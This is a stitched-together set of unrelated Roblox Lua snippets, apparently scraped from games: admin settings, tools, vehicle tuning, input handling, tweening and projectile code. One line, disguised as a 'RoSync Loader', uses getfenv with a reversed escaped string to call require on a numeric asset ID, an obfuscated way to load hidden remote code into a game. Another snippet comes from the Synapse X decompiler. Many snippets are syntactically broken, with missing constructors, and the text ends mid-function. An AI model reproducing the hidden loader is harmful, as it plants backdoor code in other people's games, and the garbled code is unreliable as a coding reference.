-- @moduledescription Manage all the player, if they are ready or not
local module = {} local System = require(game.ReplicatedStorage.System) module.OnReady = function module.Init() System.Remotes.ConnectEvent("Ready", function(plr) print(plr, "is ready!") local Player = System.Player.Get(plr) Player.Ready = true System.Entity.ReplicateToNewPlayer(plr) Player:OnDeath(true) end) game.Players.PlayerRemoving:Connect(function(p) local plr = System.Player.Get(p) if not plr then return end print(plr:ToString(), "Left") plr:Destroy() end) end return module
--[[ Calls a callback on `done` with specific arguments. ]]
function Promise.prototype:doneCall(callback, ...) assert(type(callback) == "function", string.format(ERROR_NON_FUNCTION, "Promise:doneCall")) local length, values = pack(...) return self:_finally(debug.traceback(nil, 2), function() return callback(unpack(values, 1, length)) end, true) end Promise.prototype.DoneCall = Promise.prototype.doneCall
function module:SetupMainVariables(location) main.hdAdminGroup = { Id = 4676369; Info = {}; } main.hdAdminGroupInfo = {} main.settingsBanRecords = {} main.alphabet = {"a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"} main.UserIdsFromName = {} main.UsernamesFromUserId = {} main.validSettings = {"Theme", "NoticeSoundId", "NoticeVolume", "NoticePitch", "ErrorSoundId", "ErrorVolume", "ErrorPitch", "AlertSoundId", "AlertVolume", "AlertPitch", "Prefix"} main.commandInfoToShowOnClient = {"Name", "Contributors", "Prefixes", "Rank", "Aliases", "Tags", "Description", "Args", "Loopable"} main.products = { Donor = 5745895; OldDonor = 2649766; } main.materials = {"Plastic", "Wood", "Concrete", "CorrodedMetal", "DiamondPlate", "Foil", "Grass", "Ice", "Marble", "Granite", "Brick", "Pebble", "Sand", "Fabric", "SmoothPlastic", "Metal", "WoodPlanks", "Cobblestone", "Neon", "Glass",} main.rankTypes = { ["Auto"] = 4; ["Perm"] = 3; ["Server"] = 2; ["Temp"] = 1; } if location == "Server" then main.pd = {} = {} main.permissions = { specificUsers = {}; gamepasses = {}; assets = {}; groups = {}; friends = 0; freeAdmin = 0; vipServerOwner = 0; vipServerPlayer = 0; owner = true } main.commandInfo = {} main.commandRanks = {} main.infoOnAllCommands = { Contributors = {}; --table Tags = {}; --table Prefixes = {}; --dictionary Aliases = {}; --dictionary } main.morphNames = {} main.toolNames = {} main.commands = {} main.playersRanked = {} main.playersUnranked = {} main.settings.UniversalPrefix = "!"; main.serverAdmins = {} main.owner = {} main.ownerId = game.CreatorId if game.CreatorType == Enum.CreatorType.Group then local success, ownerInfo for i = 1, 10 do success, ownerInfo = pcall(function() return main.groupService:GetGroupInfoAsync(game.CreatorId).Owner end) if success then break end task.wait(1) end if success then main.ownerId = ownerInfo.Id main.ownerName = ownerInfo.Name end end main.gameName = (game.PlaceId > 0 and main.marketplaceService:GetProductInfo(game.PlaceId, Enum.InfoType.Asset).Name) or "GameNameFailedToLoad" main.listOfTools = {} main.ranksAllowedToJoin = 0 main.permissionToReplyToPrivateMessage = {} main.logs = { command = {}; chat = {}; } main.isStudio = main.runService:IsStudio() main.serverBans = {} main.blacklistedVipServerCommands = {} main.banned = {} main.commandBlocks = {} --Collisions for i = 1,3 do pcall(function() main.physicsService:CreateCollisionGroup("Group"..i) end) end main.physicsService:CollisionGroupSetCollidable("Group1", "Group2", false) elseif location == "Client" then main.qualifiers = {"me", "all", "others", "random", "admins", "nonAdmins", "friends", "nonFriends", "NBC", "BC", "TBC", "OBC", "R6", "R15", "rthro", "nonRthro"} main.colors = {} main.topbarEnabled = true main.blur ="BlurEffect", main.blur.Size = 0 main.commandMenus = {} main.commandsToDisableCompletely = {laserEyes=true} main.commandsActive = {} main.commandsAllowedToUse = {} main.commandsWithMenus = { ["Type1"] = { ["laserEyes"] = {"Info", "Press and hold to activate."}; ["fly"] = {"Input", "Speed"}; ["fly2"] = {"Input", "Speed"}; ["noclip"] = {"Input", "Speed"}; ["noclip2"] = {"Input", "Speed"}; }; ["Type2"] = { ["cmdbar2"] = {}; }; ["Type3"] = { ["bubbleChat"] = {}; }; } main.commandSpeeds = { fly = 50; fly2 = 50; noclip = 100; noclip2 = 25; } for commandName, defaultSpeed in pairs(main.commandSpeeds) do local setting = main.settings.CommandLimits[commandName] if setting then local limit = setting.Limit if defaultSpeed > limit then main.commandSpeeds[commandName] = limit end end end main.infoFramesViewed = { Speed = true; } end table.sort(main.settings.Ranks, function(a,b) return a[1] < b[1] end) end return module
-------- OMG HAX
r = game:service("RunService") Tool = script.Parent local equalizingForce = 236 / 1.2 -- amount of force required to levitate a mass local gravity = .9999999999999999 -- things float at > 1 local ghostEffect = nil local massCon1 = nil local massCon2 = nil function recursiveGetLift(node) local m = 0 local c = node:GetChildren() for i=1,#c do if c[i].className == "Part" then if c[i].Name == "Handle" then m = m + (c[i]:GetMass() * equalizingForce * 1) -- hack that makes hats weightless, so different hats don't change your jump height else m = m + (c[i]:GetMass() * equalizingForce * gravity) end end m = m + recursiveGetLift(c[i]) end return m end function onMassChanged(child, char) print("Mass changed:" .. child.Name .. " " .. char.Name) if (ghostEffect ~= nil) then ghostEffect.force =, recursiveGetLift(char) ,0) end end function UpdateGhostState(isUnequipping) if isUnequipping == true then ghostEffect:Remove() ghostEffect = nil massCon1:disconnect() massCon2:disconnect() else if ghostEffect == nil then local char = Tool.Parent if char == nil then return end ghostEffect ="BodyForce") ghostEffect.Name = "GravityCoilEffect" ghostEffect.force =, recursiveGetLift(char) ,0) ghostEffect.Parent = char.Head ghostChar = char massCon1 = char.ChildAdded:connect(function(child) onMassChanged(child, char) end) massCon2 = char.ChildRemoved:connect(function(child) onMassChanged(child, char) end) end end end function onEquipped() Tool.Handle.PopSound:Play() UpdateGhostState(false) end function onUnequipped() UpdateGhostState(true) end script.Parent.Equipped:connect(onEquipped) script.Parent.Unequipped:connect(onUnequipped)
--wait(8) --local x = game.ServerStorage.Backpacks:FindFirstChild(equipped.Value):Clone() --x.Name = "Backpack" --x.Parent = character
--[[ Public API ]]
-- function Gamepad:Enable() local forwardValue = 0 local backwardValue = 0 local leftValue = 0 local rightValue = 0 local moveFunc = LocalPlayer.Move local gamepadSupports = UserInputService.GamepadSupports local controlCharacterGamepad = function(actionName, inputState, inputObject) if activateGamepad ~= inputObject.UserInputType then return end if inputObject.KeyCode ~= Enum.KeyCode.Thumbstick1 then return end if inputState == Enum.UserInputState.Cancel then MasterControl:AddToPlayerMovement(-currentMoveVector) currentMoveVector =,0,0) return end if inputObject.Position.magnitude > thumbstickDeadzone then MasterControl:AddToPlayerMovement(-currentMoveVector) currentMoveVector =, 0, -inputObject.Position.Y) MasterControl:AddToPlayerMovement(currentMoveVector) else MasterControl:AddToPlayerMovement(-currentMoveVector) currentMoveVector =,0,0) end end local jumpCharacterGamepad = function(actionName, inputState, inputObject) if activateGamepad ~= inputObject.UserInputType then return end if inputObject.KeyCode ~= Enum.KeyCode.ButtonA then return end if inputState == Enum.UserInputState.Cancel then MasterControl:SetIsJumping(false) return end MasterControl:SetIsJumping(inputObject.UserInputState == Enum.UserInputState.Begin) end local doDpadMoveUpdate = function(userInputType) if LocalPlayer and LocalPlayer.Character then MasterControl:AddToPlayerMovement(-currentMoveVector) currentMoveVector = + rightValue,0,forwardValue + backwardValue) MasterControl:AddToPlayerMovement(currentMoveVector) end end local moveForwardFunc = function(actionName, inputState, inputObject) if inputState == Enum.UserInputState.End then forwardValue = -1 elseif inputState == Enum.UserInputState.Begin or inputState == Enum.UserInputState.Cancel then forwardValue = 0 end doDpadMoveUpdate(inputObject.UserInputType) end local moveBackwardFunc = function(actionName, inputState, inputObject) if inputState == Enum.UserInputState.End then backwardValue = 1 elseif inputState == Enum.UserInputState.Begin or inputState == Enum.UserInputState.Cancel then backwardValue = 0 end doDpadMoveUpdate(inputObject.UserInputType) end local moveLeftFunc = function(actionName, inputState, inputObject) if inputState == Enum.UserInputState.End then leftValue = -1 elseif inputState == Enum.UserInputState.Begin or inputState == Enum.UserInputState.Cancel then leftValue = 0 end doDpadMoveUpdate(inputObject.UserInputType) end local moveRightFunc = function(actionName, inputState, inputObject) if inputState == Enum.UserInputState.End then rightValue = 1 elseif inputState == Enum.UserInputState.Begin or inputState == Enum.UserInputState.Cancel then rightValue = 0 end doDpadMoveUpdate(inputObject.UserInputType) end local function setActivateGamepad() if activateGamepad then ContextActionService:UnbindActivate(activateGamepad, Enum.KeyCode.ButtonR2) end assignActivateGamepad() if activateGamepad then ContextActionService:BindActivate(activateGamepad, Enum.KeyCode.ButtonR2) end end ContextActionService:BindAction("JumpButton",jumpCharacterGamepad, false, Enum.KeyCode.ButtonA) ContextActionService:BindAction("MoveThumbstick",controlCharacterGamepad, false, Enum.KeyCode.Thumbstick1) setActivateGamepad() if not gamepadSupports(UserInputService, activateGamepad, Enum.KeyCode.Thumbstick1) then -- if the gamepad supports thumbsticks, theres no point in having the dpad buttons getting eaten up by these actions ContextActionService:BindAction("forwardDpad", moveForwardFunc, false, Enum.KeyCode.DPadUp) ContextActionService:BindAction("backwardDpad", moveBackwardFunc, false, Enum.KeyCode.DPadDown) ContextActionService:BindAction("leftDpad", moveLeftFunc, false, Enum.KeyCode.DPadLeft) ContextActionService:BindAction("rightDpad", moveRightFunc, false, Enum.KeyCode.DPadRight) end gamepadConnectedCon = UserInputService.GamepadDisconnected:connect(function(gamepadEnum) if activateGamepad ~= gamepadEnum then return end MasterControl:AddToPlayerMovement(-currentMoveVector) currentMoveVector =,0,0) activateGamepad = nil setActivateGamepad() end) gamepadDisconnectedCon = UserInputService.GamepadConnected:connect(function(gamepadEnum) if activateGamepad == nil then setActivateGamepad() end end) end function Gamepad:Disable() ContextActionService:UnbindAction("forwardDpad") ContextActionService:UnbindAction("backwardDpad") ContextActionService:UnbindAction("leftDpad") ContextActionService:UnbindAction("rightDpad") ContextActionService:UnbindAction("MoveThumbstick") ContextActionService:UnbindAction("JumpButton") ContextActionService:UnbindActivate(activateGamepad, Enum.KeyCode.ButtonR2) if gamepadConnectedCon then gamepadConnectedCon:disconnect() end if gamepadDisconnectedCon then gamepadDisconnectedCon:disconnect() end activateGamepad = nil MasterControl:AddToPlayerMovement(-currentMoveVector) currentMoveVector =,0,0) MasterControl:SetIsJumping(false) end return Gamepad
--[[ Last synced 8/20/2021 05:26 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722905184) --[[ ]]--
--[[ setTriggerWordsForChatAnimation(animationId: string, triggerWords: { string }): nil Use this function to register a new animation in the "chat emote" feature. Typing any word included in the `triggerWords` list that is passed as an argument will activate the animation whose ID is passed as the first parameter. Trigger words support [Lua string patters]( for detecting multiple combinations of characters in a single word. For instance, using the trigger word `haha[ha]*` will activate the corresponding animation for any message that includes, for instance, the words `hahahahahaha`, `haha`, `hahaaaaa`, etc. ]]
local waveAnimationId = "rbxassetid://3344650532" -- "Wave" animation
---------------------------------------------------------------------------------------------------- --------------------=[ CFRAME ]=-------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------
,EnableHolster = false ,HolsterTo = 'Torso' -- Put the name of the body part you wanna holster to ,HolsterPos =,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)) ,RightArmPos =, 0.15, -1.2) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0)) --Server ,LeftArmPos =,0.9,-1.4) * CFrame.Angles(math.rad(-100),math.rad(25),math.rad(-20)) --server ,ServerGunPos =, -1, -0.4) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0)) ,GunPos =, -0.15, 1) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(0)) ,RightPos =, -0.2, -1) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0)) --Client ,LeftPos =,-0.05,-1.4) * CFrame.Angles(math.rad(-120),math.rad(35),math.rad(-20)) --Client } return Config
-- TABLES --
local Colors = { [1] = Color3.fromRGB(253, 157, 57), [2] = Color3.fromRGB(253, 168, 31), [3] = Color3.fromRGB(253, 185, 25), [4] = Color3.fromRGB(253, 107, 33), [5] = Color3.fromRGB(253, 51, 24), [6] = Color3.fromRGB(253, 159, 7), [7] = Color3.fromRGB(253, 181, 97), [8] = Color3.fromRGB(253, 226, 72), [9] = Color3.fromRGB(253, 155, 110), [10] = Color3.fromRGB(0, 0, 0), }
--Torque Curve Tune.Horsepower = 707 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 6000 -- Use sliders to manipulate values Tune.Redline = 6700 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 5500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 1.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 150 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
-- Dependencies
local Conf = require(ReplicatedFirst.Configurations.MainConfiguration)
--- Begins tracking scope and target changes.
function ScopeHUD:didMount() self:UpdateTargetingState() -- Set up targeting change listeners local Targeting = self.props.Core.Targeting self.Maid.ScopeChangeListener = Targeting.ScopeChanged:Connect(function (Scope) Targeting:UpdateTarget() self:setState({ Scope = Scope or Roact.None; }) end) self.Maid.ScopeTargetChangeListener = Targeting.ScopeTargetChanged:Connect(function (ScopeTarget) self:setState({ ScopeTarget = ScopeTarget or Roact.None; }) end) self.Maid.TargetChangeListener = Targeting.TargetChanged:Connect(function (DirectTarget) self:setState({ DirectTarget = DirectTarget or Roact.None; }) end) self.Maid.ScopeLockChangeListener = Targeting.ScopeLockChanged:Connect(function (IsScopeLocked) self:setState({ IsScopeLocked = IsScopeLocked; }) end) -- Set up alt key listeners local function AltKeyCallback(_, State, Input) if State.Name == 'Begin' then self:setState({ IsAltDown = true; }) elseif State.Name == 'End' then self:setState({ IsAltDown = false; }) end return Enum.ContextActionResult.Pass end ContextActionService:BindAction('BT/ScopeHUD: Scope', AltKeyCallback, false, Enum.KeyCode.LeftAlt, Enum.KeyCode.RightAlt ) -- Set up content size listener if self.LayoutRef.current then local Layout = self.LayoutRef.current local LayoutChanged = Layout:GetPropertyChangedSignal('AbsoluteContentSize') self.UpdateContainerSize(, Layout.AbsoluteContentSize.X, 0, 38/2)) self.Maid.LayoutListener = LayoutChanged:Connect(function () self.UpdateContainerSize(, Layout.AbsoluteContentSize.X, 0, 38/2)) end) end end
-- its best to anchor while welding, and then unanchor when finished
parts_table=script.Parent:GetChildren() round=function(num) local a,b=math.modf(num) if num%1~=0 then return math.floor(num)+math.floor(b*10)/10 else return math.floor(num) end end function convertSizeToScale(t) for i,v in pairs(t) do if v:IsA"BasePart" then if v:findFirstChild"Mesh" then if not v.Size ==, 0.2, 0.2) then local vm=v.Mesh local vsize=v.Size local vscale=vm.Scale local percx=vsize.X/vscale.X local percy=vsize.Y/vscale.Y local percz=vsize.Z/vscale.Z local,0,0) if round(v.Size.X*10)/10 ~= 0.2 then print(v.Name, v.Size.X) vtotalsize = vtotalsize + * 5, 0, 0) else vtotalsize = vtotalsize +, 0, 0) end if round(v.Size.Y*10)/10 ~= 0.2 then vtotalsize = vtotalsize +, percy * 5, 0) else vtotalsize = vtotalsize +, vm.Scale.Y, 0) end if round(v.Size.Z*10)/10 ~= 0.2 then vtotalsize = vtotalsize +, 0, percz * 5) else vtotalsize = vtotalsize +, 0, vm.Scale.Z) end local prevc=v.CFrame,0.2,0.2) v.CFrame=prevc vm.Scale=vtotalsize end end end end end function weld(modelgroup,anchored,cancollide) local parts,last = {} local function scan(parent) for _,v in pairs(parent:GetChildren()) do if (v:IsA("BasePart")) then if (last) then local w ="Weld") w.Name = ("Weld") w.Part0,w.Part1 = last,v w.C0 = last.CFrame:inverse() w.C1 = v.CFrame:inverse() w.Parent = last end last = v table.insert(parts,v) end scan(v) end end scan(modelgroup) for _,v in pairs(parts) do v.Anchored=anchored v.CanCollide=cancollide end end wait(1) for i, v in pairs (script.Parent:GetChildren()) do if v:FindFirstChild("Weld") then v.Weld:Destroy() end end convertSizeToScale(parts_table) weld(script.Parent,true,false)
--[=[ @param signal RBXScriptSignal @param fn (...: any) -> any @return RBXScriptConnection Connects the function to the signal, adds the connection to the trove, and then returns the connection. ```lua trove:Connect(workspace.ChildAdded, function(instance) print(instance.Name .. " added to workspace") end) ``` ]=]
function Trove:Connect(signal, fn) return self:Add(signal:Connect(fn)) end
while true do wait(0.5) local target = findNearestTorso(script.Parent.Torso.Position) if target ~= nil then script.Parent.EnemyHumanoid:MoveTo(target.Position, target) end end
--Don't edit anything below unless you can script well! --This plane was made by TurboFusion
repeat wait() until game.Players.LocalPlayer --This line makes the tool wait until it is in the Player's backpack
--[[ PartUtility Description: A simple litle class that compresses common instructions like getting a character from an instance or making something entirely invisible. ]]
local PartUtility = {}
--[[ ___ _______ _ / _ |____/ ___/ / ___ ____ ___ (_)__ / __ /___/ /__/ _ \/ _ `(_-<(_-</ (_-< /_/ |_| \___/_//_/\_,_/___/___/_/___/ SecondLogic @ Inspare ]]
local autoscaling = false --Estimates top speed local UNITS = { --Click on speed to change units --First unit is default { units = "MPH" , scaling = (10/12) * (60/88) , -- 1 stud : 10 inches | ft/s to MPH maxSpeed = 140 , spInc = 20 , -- Increment between labelled notches }, { units = "KM/H" , scaling = (10/12) * 1.09728 , -- 1 stud : 10 inches | ft/s to KP/H maxSpeed = 240 , spInc = 20 , -- Increment between labelled notches }, { units = "SPS" , scaling = 1 , -- Roblox standard maxSpeed = 300 , spInc = 60 , -- Increment between labelled notches } }
-- Decompiled with the Synapse X Luau decompiler.
local v1 = script:FindFirstAncestor("MainUI"); local v2 = game["Run Service"]; local l__UserInputService__3 = game:GetService("UserInputService"); local v4 = {}; local u1 = {}; local u2 = require(script.Parent.Parent); local l__LocalPlayer__3 = game.Players.LocalPlayer; local l__TweenService__4 = game:GetService("TweenService"); function v4.update(p1) u1 = {}; if u2.dead == true then p1 = false; end; for v5, v6 in pairs(game.Players:GetChildren()) do local v7, v8 = pcall(function() if v6.Character and v6 ~= l__LocalPlayer__3 then local v9 = {}; for v10, v11 in pairs(v6.Character:GetDescendants()) do if v11:IsA("BasePart") and v11.Transparency < 1 then table.insert(v9, v11); end; end; table.insert(u1, { v6.Character, v9 }); end; end); if v8 then warn(v8); end; end; local v12, v13 = pcall(function() for v14, v15 in pairs(u1) do local v16 = v15[1]; local v17 = v15[2]; local v18 = v15[2][1]; if v18 then if v18:GetAttribute("Hidden") ~= true and p1 == true then for v19, v20 in pairs(v17) do l__TweenService__4:Create(v20,, { LocalTransparencyModifier = 0.7 }):Play(); end; v18:SetAttribute("Hidden", true); elseif v18:GetAttribute("Hidden") == true and p1 == false then for v21, v22 in pairs(v17) do l__TweenService__4:Create(v22,, { LocalTransparencyModifier = 0 }):Play(); end; v18:SetAttribute("Hidden", false); end; end; wait(); end; end); if v13 then warn(v13); end; end; v4.update(false); game.Players.PlayerAdded:Connect(v4.update); game.Players.PlayerRemoving:Connect(v4.update); for v23, v24 in pairs(game.Players:GetChildren()) do v24.CharacterAdded:Connect(v4.update); end; return v4;
---[[ Font Settings ]]
module.DefaultFont = Enum.Font.GothamBold module.ChatBarFont = Enum.Font.GothamBold
--A data-loading function.
function LoadData(Player) if PlayersItems:GetAsync(Player.UserId) ~= nil then for i,ToolName in ipairs(PlayersItems:GetAsync(Player.UserId)) do local Tool = game.ServerStorage[ToolName] local PlayerTool = Tool:Clone() PlayerTool.Parent = Player.Backpack end end end
-- Function to recursively search for a child of a given class
local function FindChildOfClassRecursive(instance, className) for _, child in pairs(instance:GetDescendants()) do if child:IsA(className) then return child end end return nil end
--[=[ @param obj any @return boolean Returns `true` if `obj` belongs to the EnumList. ]=]
function EnumList:BelongsTo(obj: any): boolean return Symbol.IsInScope(obj, self._scope) end export type EnumList = typeof("", {""})) return EnumList
-- print(string.format("[%s] %s", getfenv(2).script.Name, (string.format(tostring(table.remove(v1, 1)), unpack(v1)))));
end, warn = function(...) -- warn(string.format(...)); end, error = function(...) --warn("ERROR: " .. string.format(...) .. "\n" .. debug.traceback()); end };
local WaitTime = 1 -- Change this to the amount of time it takes for the button to re-enable. local modelname = "Regen" ---If your model is not named this, then make the purple words the same name as the model!
Tune.LoadDelay = .5 -- Delay before initializing chassis (in seconds) Tune.AutoStart = false -- Set to false if using manual ignition plugin Tune.AutoFlip = true -- Set to false if using manual flip plugin
--[[ Returns a value with Out tween direction of an Exponential tween style that reverses at a specified midpoint. Alpha and return value are both 0 <= x <= 1, and midpoint is 0 < x < 1. --]]
local EPSILON = 0.001 local function getExponentialTweenValueWithMidpoint(alpha: number, midpoint: number) -- To avoid division by zero, midpoint needs to be 0 < midpoint < 1. Its purpose -- is to be somewhere between the 0 and 1 bounds to provide a switching point from -- increasing to decreasing, so logically it shouldn't be at either boundary. For this reason, -- we define EPSILON to define how near the bounds it can be. midpoint = math.clamp(midpoint, EPSILON, 1 - EPSILON) alpha = math.clamp(alpha, 0, 1) local function increasing() return 1 - 2 ^ (-10 * alpha / midpoint) end local function decreasing() return 1 - 2 ^ (10 * (alpha - 1) / (1 - midpoint)) end return if alpha <= midpoint then increasing() else decreasing() end return getExponentialTweenValueWithMidpoint
-- FALL SERVICE -- --local DefaultGroup ="Default", 20, 0.4, { --last argument is optional -- ["MaterialsDamage"] = { -- ["Water"] = 0, -- multiply damage by 0 if fall in water (so 0 damage) -- ["Fabric"] = 0.85, -- by default all materials have 1 multiplier -- ["Grass"] = 0.85, -- ["Sand"] = 0.75 -- } --})
-- Check if character is there
if script.Owner.Value.Character ~= nil then -- Find knife local knife = nil if script.Owner.Value.Backpack:FindFirstChild("Knife") then knife = script.Owner.Value.Backpack.Knife elseif script.Owner.Value.Character:FindFirstChild("Knife") then knife = script.Owner.Value.Character.Knife end if knife ~= nil then -- Make knife reload faster knife.KnifeScript.KnifeThrowCooldown.Value = knife.KnifeScript.KnifeThrowCooldown.Value * COOLDOWN_CHANGE end end
--local Items = { -- ["Name"] = { -- Price = 300, -- CurrencyType = Enum.CurrencyType.Default; -- Decal = 123456, -- NameInItemsFolder --[[ReplicatedStorage/Gears]] = "Gear", -- Name --[[because tables work stupidly]] = "Gear", -- Special = "This is what appears in the description section"; -- GamepassId = 1276132162 --Dev product ID -- }; -- ["test"] = { -- Price = 300, -- CurrencyType = Enum.CurrencyType.Default; -- Decal = "", -- NameInItemsFolder --[[ReplicatedStorage/Gears]] = "an actual house", -- Name --[[because tables work stupidly]] = "an actual house", -- Special = "lol"; -- GamepassId = 123456; --Not used in this case, as it's a FB item. -- }; --}
if gear.Value == -1 then if carSeat.Throttle == 1 then rwd.Throttle = -1 rwd.Torque = tq/1.2 rwd.MaxSpeed = maxspeed/10 lwd.Throttle = -1 lwd.Torque = ftq/1.2 lwd.MaxSpeed = maxspeed/10 rrwd.Throttle = -1 rrwd.Torque = ftq/1.2 rrwd.MaxSpeed = maxspeed/10 elseif carSeat.Throttle == -1 then rb.RB.CanCollide = true rb.FB.CanCollide = true lfb.RB.CanCollide = true lfb.FB.CanCollide = true rfb.RB.CanCollide = true rfb.FB.CanCollide = true wait(brakes) rb.RB.CanCollide = false rb.FB.CanCollide = false lfb.RB.CanCollide = false lfb.FB.CanCollide = false rfb.RB.CanCollide = false rfb.FB.CanCollide = false wait() elseif carSeat.Throttle == 0 then rwd.Throttle = 0 rwd.Torque = cst rwd.MaxSpeed = maxspeed lwd.Throttle = 0 lwd.Torque = cst lwd.MaxSpeed = maxspeed rrwd.Throttle = 0 rrwd.Torque = cst rrwd.MaxSpeed = maxspeed rb.RB.CanCollide = false rb.FB.CanCollide = false lfb.RB.CanCollide = false lfb.FB.CanCollide = false rfb.RB.CanCollide = false rfb.FB.CanCollide = false end end
--[[ [Horizontal and Vertical limits for head and body tracking.] [Setting to 0 negates tracking, setting to 1 is normal tracking, and setting to anything higher than 1 goes past real life head/body rotation capabilities.] --]]
local HeadHorFactor = 1 local HeadVertFactor = 1 local BodyHorFactor = 1.5 local BodyVertFactor = 1.4
--[=[ @within Keyboard @prop KeyDown Signal<Enum.KeyCode> @tag Event Fired when a key is pressed. ```lua keyboard.KeyDown:Connect(function(key: KeyCode) print("Key pressed", key) end) ``` ]=] --[=[ @within Keyboard @prop KeyUp Signal<Enum.KeyCode> @tag Event Fired when a key is released. ```lua keyboard.KeyUp:Connect(function(key: KeyCode) print("Key released", key) end) ``` ]=]
-- Roblox NPC sound script
local Players = game:GetService("Players") local RunService = game:GetService("RunService") local SOUND_DATA = { Climbing = { SoundId = "rbxasset://sounds/action_footsteps_plastic.mp3", Looped = true, }, Died = { SoundId = "", }, FreeFalling = { SoundId = "rbxasset://sounds/action_falling.mp3", Looped = true, }, GettingUp = { SoundId = "rbxasset://sounds/action_get_up.mp3", }, Jumping = { SoundId = "rbxasset://sounds/action_jump.mp3", }, Landing = { SoundId = "rbxasset://sounds/action_jump_land.mp3", }, Running = { SoundId = "rbxasset://sounds/action_footsteps_plastic.mp3", Looped = true, Pitch = 1.85, }, Splash = { SoundId = "rbxasset://sounds/impact_water.mp3", }, Swimming = { SoundId = "rbxasset://sounds/action_swim.mp3", Looped = true, Pitch = 1.6, }, }
--[=[ @function toSet @within Array @param array {T} -- The array to convert to a set. @return Set<T> -- The set. Converts an array to a set. ```lua local array = { "a", "b", "b", "c", "d" } local set = ToSet(array) -- { a = true, b = true, c = true, d = true } ``` ]=]
local function toSet<T>(array: { T }): _T.Set<T> local set = {} for _, value in ipairs(array) do set[value] = true end return set end return toSet
-- carSeat.Parent.Body.Dash.Screen.G.Radio.Song.Text = "PRESET 1" -- carSeat.Parent.Body.Dash.Screen.G.Radio.Title.Text = ""
elseif carSeat.Stations.mood.Value == 1 then carSeat.Parent.Body.MP.Sound:Stop() carSeat.Stations.mood.Value = 5
-- a: amplitud -- p: period
local function outElastic(t, b, c, d, a, p) if t == 0 then return b end t = t / d if t == 1 then return b + c end if not p then p = d * 0.3 end local s if not a or a < abs(c) then a = c s = p / 4 else s = p / (2 * pi) * asin(c/a) end return a * pow(2, -10 * t) * sin((t * d - s) * (2 * pi) / p) + c + b end
script.Parent.KickDoor.MouseButton1Click:Connect(function() House.DoAction:InvokeServer('Kick') end)
-- Make sure to spell it 100% correct.
local permissions = { cmds = 'Players', help = 'Players', m = 'Admins', exploitlogs = 'Admins', } local defaultLevel = 'Creators' -- The permission level that will be set for commands not configured above.
--[[ SERVICES ]]
-- local TweenService = game:GetService("TweenService") local StarterGui = game:GetService("StarterGui")
local function ModifyTransformation(cast: ActiveCast, velocity: Vector3?, acceleration: Vector3?, position: Vector3?) local trajectories = cast.StateInfo.Trajectories local lastTrajectory = trajectories[#trajectories] -- NEW BEHAVIOR: Don't create a new trajectory if we haven't even used the current one. if lastTrajectory.StartTime == cast.StateInfo.TotalRuntime then -- This trajectory is fresh out of the box. Let's just change it since it hasn't actually affected the cast yet, so changes won't have adverse effects. if (velocity == nil) then velocity = lastTrajectory.InitialVelocity end if (acceleration == nil) then acceleration = lastTrajectory.Acceleration end if (position == nil) then position = lastTrajectory.Origin end lastTrajectory.Origin = position lastTrajectory.InitialVelocity = velocity lastTrajectory.Acceleration = acceleration else -- The latest trajectory is done. Set its end time and get its location. lastTrajectory.EndTime = cast.StateInfo.TotalRuntime local point, velAtPoint = unpack(GetLatestTrajectoryEndInfo(cast)) if (velocity == nil) then velocity = velAtPoint end if (acceleration == nil) then acceleration = lastTrajectory.Acceleration end if (position == nil) then position = point end table.insert(cast.StateInfo.Trajectories, { StartTime = cast.StateInfo.TotalRuntime, EndTime = -1, Origin = position, InitialVelocity = velocity, Acceleration = acceleration }) cast.StateInfo.CancelHighResCast = true end end function ActiveCastStatic:SetVelocity(velocity: Vector3) assert(getmetatable(self) == ActiveCastStatic, ERR_NOT_INSTANCE:format("SetVelocity", "")) assert(self.StateInfo.UpdateConnection ~= nil, ERR_OBJECT_DISPOSED) ModifyTransformation(self, velocity, nil, nil) end function ActiveCastStatic:SetAcceleration(acceleration: Vector3) assert(getmetatable(self) == ActiveCastStatic, ERR_NOT_INSTANCE:format("SetAcceleration", "")) assert(self.StateInfo.UpdateConnection ~= nil, ERR_OBJECT_DISPOSED) ModifyTransformation(self, nil, acceleration, nil) end function ActiveCastStatic:SetPosition(position: Vector3) assert(getmetatable(self) == ActiveCastStatic, ERR_NOT_INSTANCE:format("SetPosition", "")) assert(self.StateInfo.UpdateConnection ~= nil, ERR_OBJECT_DISPOSED) ModifyTransformation(self, nil, nil, position) end function ActiveCastStatic:GetVelocity(): Vector3 assert(getmetatable(self) == ActiveCastStatic, ERR_NOT_INSTANCE:format("GetVelocity", "")) assert(self.StateInfo.UpdateConnection ~= nil, ERR_OBJECT_DISPOSED) local currentTrajectory = self.StateInfo.Trajectories[#self.StateInfo.Trajectories] return GetVelocityAtTime(self.StateInfo.TotalRuntime - currentTrajectory.StartTime, currentTrajectory.InitialVelocity, currentTrajectory.Acceleration) end function ActiveCastStatic:GetAcceleration(): Vector3 assert(getmetatable(self) == ActiveCastStatic, ERR_NOT_INSTANCE:format("GetAcceleration", "")) assert(self.StateInfo.UpdateConnection ~= nil, ERR_OBJECT_DISPOSED) local currentTrajectory = self.StateInfo.Trajectories[#self.StateInfo.Trajectories] return currentTrajectory.Acceleration end function ActiveCastStatic:GetPosition(): Vector3 assert(getmetatable(self) == ActiveCastStatic, ERR_NOT_INSTANCE:format("GetPosition", "")) assert(self.StateInfo.UpdateConnection ~= nil, ERR_OBJECT_DISPOSED) local currentTrajectory = self.StateInfo.Trajectories[#self.StateInfo.Trajectories] return GetPositionAtTime(self.StateInfo.TotalRuntime - currentTrajectory.StartTime, currentTrajectory.Origin, currentTrajectory.InitialVelocity, 